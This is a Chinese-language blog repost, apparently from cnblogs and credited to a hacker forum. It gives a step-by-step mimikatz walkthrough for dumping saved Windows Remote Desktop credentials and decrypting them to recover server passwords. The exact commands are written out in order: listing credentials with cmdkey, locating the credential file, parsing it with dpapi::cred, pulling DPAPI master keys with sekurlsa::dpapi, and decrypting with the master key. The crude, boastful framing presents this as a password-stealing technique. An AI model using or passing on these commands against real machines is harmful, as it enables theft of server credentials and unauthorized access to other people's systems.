zoukankan      html  css  js  c++  java
  • 利用mimikatz破解远程终端凭据,获取服务器密码

    测试环境:windows 10


    道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了。
    但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。

    1.png

    0x01 凭据管理器中查看Windows凭据:

    TERMSRV/1xx.xxx.xxx.xx2

    2.png

    可通过命令行获取,执行: cmdkey /list
            注意:该命令务必在Session会话下执行,system下执行无结果。

    0x02 凭据存储在用户目录下: 

    C:Users<username>AppDataLocalMicrosoftCredentials*

    图中名为

    "FF359429D6F19C64BA7D3E282558EEB5"的文件即为目标凭据:TERMSRV/1xx.xxx.xxx.xx2的存储文件

    3.png

    0x03 执行:

    mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5"

    4.png

    pbData是凭据的加密数据,guidMasterKey是凭据的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}。

    0x04 执行:

    mimikatz privilege::debug sekurlsa::dpapi

    5.png

    根据目标凭据GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

    0x05 拿到了MasterKey,服务器密码便唾手可得。执行解密命令:

    mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"

    6.png

    解密出来的CredentialBlob即为凭据TERMSRV/1xx.xxx.xxx.xx2的服务器密码。

    文章来源于国内安全交流论坛土司-_-

  • 相关阅读:
    POJ-1088 滑雪 (包含部分自用测试数据)
    PHP-从零开始使用Solr搜索引擎服务(下)
    PHP-从零开始使用Solr搜索引擎服务(上)
    15位身份证号转化为18位身份证号
    php的数组转为对象
    H5页面遮罩弹框下层还能滚动的问题
    纯css实现长宽等比例的div
    VUE开发一个图片轮播的组件
    jQuery map和each用法
    表格式布局让每个列高度等于该行最大高度
  • 原文地址:https://www.cnblogs.com/hookjoy/p/9133035.html
Copyright © 2011-2022 走看看